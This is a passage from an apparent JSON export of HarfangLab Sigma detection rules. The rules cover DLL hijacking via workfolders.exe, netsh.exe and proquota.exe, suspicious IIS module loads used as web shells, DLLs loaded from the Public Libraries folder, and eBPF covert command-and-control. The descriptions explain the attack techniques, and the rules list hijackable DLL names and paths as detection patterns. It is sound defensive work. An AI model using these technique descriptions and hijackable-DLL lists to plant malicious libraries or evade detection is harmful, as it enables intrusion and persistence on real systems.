classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'workfolders.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\davclnt.dll'\n - '\\DEVOBJ.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\drprov.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\policymanager.dll'\n - '\\PROPSYS.dll'\n - '\\USERENV.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ad1a87e-1efd-47a3-a74b-3ec148f9992a",
"rule_name": "DLL Hijacking via workfolders.exe",
"rule_description": "Detects potential Windows DLL Hijacking via workfolders.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075904Z",
"creation_date": "2026-03-23T11:45:34.075906Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075910Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference",
"https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/",
"https://attack.mitre.org/techniques/T1505/004/"
],
"name": "t1505_004_iis_module_native_load_pre43.yml",
"content": "title: Suspicious IIS Module Loaded\nid: 0ae4376f-360f-4b97-9b3f-4c735a82fbf6\ndescription: |\n Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\n Malicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\n It is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n This rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/20\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessDescription: 'IIS Worker Process'\n ImageLoaded|re:\n - '(?i)^[A-Z]:\\\\Windows\\\\System32\\\\inetsrv\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n AgentVersion|lt|version: 4.3 # Before this version, only native DLL are considered, see 29dfc6e6-c42a-4009-8e21-367675f7e417\n\n filter_legitimate_common_modules_bypath:\n ImageLoaded:\n - '?:\\Windows\\System32\\inetsrv\\authanon.dll'\n - '?:\\Windows\\System32\\inetsrv\\authbas.dll'\n - '?:\\Windows\\System32\\inetsrv\\authcert.dll'\n - '?:\\Windows\\System32\\inetsrv\\authmd5.dll'\n - '?:\\Windows\\System32\\inetsrv\\authsspi.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachfile.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachhttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachtokn.dll'\n - '?:\\Windows\\System32\\inetsrv\\cachuri.dll'\n - '?:\\Windows\\System32\\inetsrv\\cgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\compdyn.dll'\n - '?:\\Windows\\System32\\inetsrv\\compstat.dll'\n - '?:\\Windows\\System32\\inetsrv\\custerr.dll'\n - '?:\\Windows\\System32\\inetsrv\\defdoc.dll'\n - '?:\\Windows\\System32\\inetsrv\\diprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\dirlist.dll'\n - '?:\\Windows\\System32\\inetsrv\\filter.dll'\n - '?:\\Windows\\System32\\inetsrv\\gzip.dll'\n - '?:\\Windows\\System32\\inetsrv\\iis_ssi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiscore.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisetw.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfcgi.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisfreb.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisreqs.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisres.dll'\n - '?:\\Windows\\System32\\inetsrv\\iisutil.dll'\n - '?:\\Windows\\System32\\inetsrv\\iiswsock.dll'\n - '?:\\Windows\\System32\\inetsrv\\iprestr.dll'\n - '?:\\Windows\\System32\\inetsrv\\isapi.dll'\n - '?:\\Windows\\System32\\inetsrv\\logcust.dll'\n - '?:\\Windows\\System32\\inetsrv\\loghttp.dll'\n - '?:\\Windows\\System32\\inetsrv\\modrqflt.dll'\n - '?:\\Windows\\System32\\inetsrv\\nativerd.dll'\n - '?:\\Windows\\System32\\inetsrv\\protsup.dll'\n - '?:\\Windows\\System32\\inetsrv\\redirect.dll'\n - '?:\\Windows\\System32\\inetsrv\\rewrite.dll'\n - '?:\\Windows\\System32\\inetsrv\\static.dll'\n - '?:\\Windows\\System32\\inetsrv\\validcfg.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3dt.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3tp.dll'\n - '?:\\Windows\\System32\\inetsrv\\w3wphost.dll'\n - '?:\\Windows\\System32\\inetsrv\\warmup.dll'\n - '?:\\Windows\\System32\\inetsrv\\wbhst_pm.dll'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n exclusion_legitimate_ms_safehtml:\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SafeHtml filter'\n InternalName: 'osafehtm'\n Product:\n - 'Microsoft SafeHtml'\n - '*Exchange - For Testing Purposes Only*'\n ImageLoaded|endswith: '\\osafehtm.dll'\n\n exclusion_legitimate_bo_crystalreports:\n Company: 'Business Objects'\n LegalCopyright|endswith: 'Business Objects'\n Product|startswith: 'Crystal Reports'\n ImageLoaded|endswith:\n - '\\CrystalDecisions.CrystalReports.Engine.dll'\n - '\\CrystalDecisions.ReportSource.dll'\n - '\\CrystalDecisions.Shared.dll'\n - '\\CrystalDecisions.Web.dll'\n\n exclusion_legitimate_ge_healtcare:\n Company: 'GE Healthcare'\n Product|startswith: 'Dicom'\n ImageLoaded|endswith: '\\DicomFileParser.dll'\n\n exclusion_legitimate_infor_mingle:\n Company: 'Infor'\n Description: 'Infor.Mingle Extension Module for IIS'\n ImageLoaded|endswith: '\\Infor.Mingle.IISModule.dll'\n\n exclusion_legitimate_zedoc:\n Company: 'BSV'\n Description|startswith: 'BSV.'\n InternalName|startswith: 'BSV.'\n ImageLoaded|endswith: '\\bin\\BSV.Videocodage.dll'\n\n exclusion_legitimate_mysqladonet:\n Company: 'MySQL AB'\n Description|startswith: 'MySql.'\n InternalName|startswith: 'MySql.'\n LegalCopyright|endswith: ', MySQL AB'\n ImageLoaded|endswith: '\\bin\\MySql.Data.dll'\n\n exclusion_legitimate_stripheaders:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\stripheaders.dll'\n sha256:\n - 'ce3698854f86e1c18f7926d57aec9a6fdba633341a128bec799698e76ef8e144'\n - '16151bbbe127469a0aab8ce7f4f954a2e585201f7d27f8ab7895a62b60f056a9'\n\n exclusion_legitimate_webdav:\n ImageLoaded: '?:\\Windows\\System32\\inetsrv\\webdav.dll'\n sha256:\n - 'fdddf849ba5c8de2f8df9650ab32578e0e74ed607f741013fa50058206b811bf'\n - '94003c985396df6f422d4ad99651a66aee401f9846ed80f82f66f2db77b3391f'\n - '53b61306ed62687b5aeeb380cda96d8a70641d4f1ab58edc26978a181d7fe1d0'\n - '8e430996c1ec91f8ef6d1b10017ad18eddde3027574cafdeb6e42e90bce516e6'\n\n exclusion_legitimate_freeimage:\n Company: 'FreeImage'\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'Soft Gold ltd'\n\n exclusion_legitimate_nicelimited:\n - Signed: 'true'\n SignatureStatus: 'Valid'\n Signature: 'NICE Systems Ltd'\n - Company: 'NICE Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications legitimately requires the loading of an unsigned library server-wide.\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0ae4376f-360f-4b97-9b3f-4c735a82fbf6",
"rule_name": "Suspicious IIS Module Loaded",
"rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\nThis rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1505.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0aede467-048c-4d8e-887a-5d4afe2b47d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586945Z",
"creation_date": "2026-03-23T11:45:34.586949Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586966Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netsh.yml",
"content": "title: DLL Hijacking via netsh.exe\nid: 0aede467-048c-4d8e-887a-5d4afe2b47d8\ndescription: |\n Detects potential Windows DLL Hijacking via netsh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netsh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\AUTHFWCFG.DLL'\n - '\\Cabinet.dll'\n - '\\CRYPTBASE.DLL'\n - '\\DHCPCMONITOR.DLL'\n - '\\dhcpcsvc6.DLL'\n - '\\dhcpcsvc.DLL'\n - '\\DNSAPI.dll'\n - '\\dot3api.dll'\n - '\\DOT3CFG.DLL'\n - '\\eappcfg.dll'\n - '\\eappprxy.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\FWCFG.DLL'\n - '\\FWPolicyIOMgr.dll'\n - '\\fwpuclnt.dll'\n - '\\HNETMON.DLL'\n - '\\HTTPAPI.dll'\n - '\\IFMON.DLL'\n - '\\IPHLPAPI.DLL'\n - '\\ktmw32.dll'\n - '\\mintdh.dll'\n - '\\MobileNetworking.dll'\n - '\\NDFAPI.DLL'\n - '\\NETIOHLP.DLL'\n - '\\netshell.dll'\n - '\\NETTRACE.DLL'\n - '\\nlaapi.dll'\n - '\\NSHHTTP.DLL'\n - '\\NSHIPSEC.DLL'\n - '\\NSHWFP.DLL'\n - '\\OneX.DLL'\n - '\\P2P.dll'\n - '\\P2PNETSH.DLL'\n - '\\PEERDISTSH.DLL'\n - '\\POLSTORE.DLL'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\RASMONTR.DLL'\n - '\\RMCLIENT.dll'\n - '\\RPCNSH.DLL'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\wcmapi.dll'\n - '\\WCNNETSH.DLL'\n - '\\wdi.dll'\n - '\\wevtapi.dll'\n - '\\WHHELPER.DLL'\n - '\\WINHTTP.dll'\n - '\\WINIPSEC.DLL'\n - '\\WINNSI.DLL'\n - '\\wlanapi.dll'\n - '\\WLANCFG.DLL'\n - '\\WSHELPER.DLL'\n - '\\WWANCFG.DLL'\n - '\\wwapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0aede467-048c-4d8e-887a-5d4afe2b47d8",
"rule_name": "DLL Hijacking via netsh.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netsh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079690Z",
"creation_date": "2026-03-23T11:45:34.079692Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079697Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/mustang-panda-targets-europe/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_user_public_libraries.yml",
"content": "title: DLL Loaded from Libraries Folder\nid: 0b84fa6b-6d3b-4041-972c-ee8b193fa745\ndescription: |\n Detects the suspicious loading of a DLL from the libraries folder of the Public user.\n This folder is an uncommon directory for a DLL to load from and is often abused by attackers.\n It is recommended to analyze the loaded DLL to look for malicious behavior or content.\nreferences:\n - https://blog.talosintelligence.com/mustang-panda-targets-europe/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/03/06\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\Users\\Public\\Libraries\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745",
"rule_name": "DLL Loaded from Libraries Folder",
"rule_description": "Detects the suspicious loading of a DLL from the libraries folder of the Public user.\nThis folder is an uncommon directory for a DLL to load from and is often abused by attackers.\nIt is recommended to analyze the loaded DLL to look for malicious behavior or content.\n",
"rule_creation_date": "2024-03-06",
"rule_modified_date": "2025-01-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0b99a008-58ed-40da-bc7d-43120837aaaf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620148Z",
"creation_date": "2026-03-23T11:45:34.620150Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620154Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf",
"https://redcanary.com/blog/threat-detection/ebpf-malware/",
"https://github.com/h3xduck/TripleCross",
"https://attack.mitre.org/techniques/T1205/002/"
],
"name": "t1205_002_possible_ebpf_covert_c2.yml",
"content": "title: Possible Extended BPF Covert C2\nid: 0b99a008-58ed-40da-bc7d-43120837aaaf\ndescription: |\n Detects a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program loaded.\n A malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\n When a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\n A TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\n Together, these components create a covert communication channel without generating visible network activity.\n It is recommended to check the process which loaded the eBPF program for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://redcanary.com/blog/threat-detection/ebpf-malware/\n - https://github.com/h3xduck/TripleCross\n - https://attack.mitre.org/techniques/T1205/002/\ndate: 2025/11/13\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.002\n - attack.t1205.001\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_load'\n ProgramTypeStr:\n - 'BPF_PROG_TYPE_XDP'\n - 'BPF_PROG_TYPE_SCHED_CLS'\n Image: '*'\n\n filter_containers:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim'\n - '|/usr/libexec/crio/conmon'\n - '|/usr/bin/containerd'\n - '|/usr/bin/lxc-start'\n\n filter_edr:\n Image:\n - '/opt/hurukai-agent/bin/hurukai'\n - '/opt/CrowdStrike/falcon-sensor-bpf*'\n\n filter_cilium:\n Image: '/usr/bin/cilium-agent'\n\n filter_network_tools:\n Image:\n - '*/*bin/kxdpgun'\n - '*/bin/netbird'\n - '*/*bin/xdp-dns'\n - '*/bin/tc'\n\n filter_bpf_tools:\n Image: '*/bin/bpftool'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0b99a008-58ed-40da-bc7d-43120837aaaf",
"rule_name": "Possible Extended BPF Covert C2",
"rule_description": "Detects a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program loaded.\nA malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\nWhen a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\nA TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\nTogether, these components create a covert communication channel without generating visible network activity.\nIt is recommended to check the process which loaded the eBPF program for suspicious activities.\n",
"rule_creation_date": "2025-11-13",
"rule_modified_date": "2026-01-22",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1205.001",
"attack.t1205.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600433Z",
"creation_date": "2026-03-23T11:45:34.600436Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600444Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_proquota.yml",
"content": "title: DLL Hijacking via proquota.exe\nid: 0b9f13f2-fe2b-43fe-9f82-22ab533221ff\ndescription: |\n Detects potential Windows DLL Hijacking via proquota.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'proquota.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff",
"rule_name": "DLL Hijacking via proquota.exe",
"rule_description": "Detects potential Windows DLL Hijacking via proquota.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0baf276d-d629-4eb2-948c-1b0f87b13160",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590863Z",
"creation_date": "2026-03-23T11:45:34.590867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
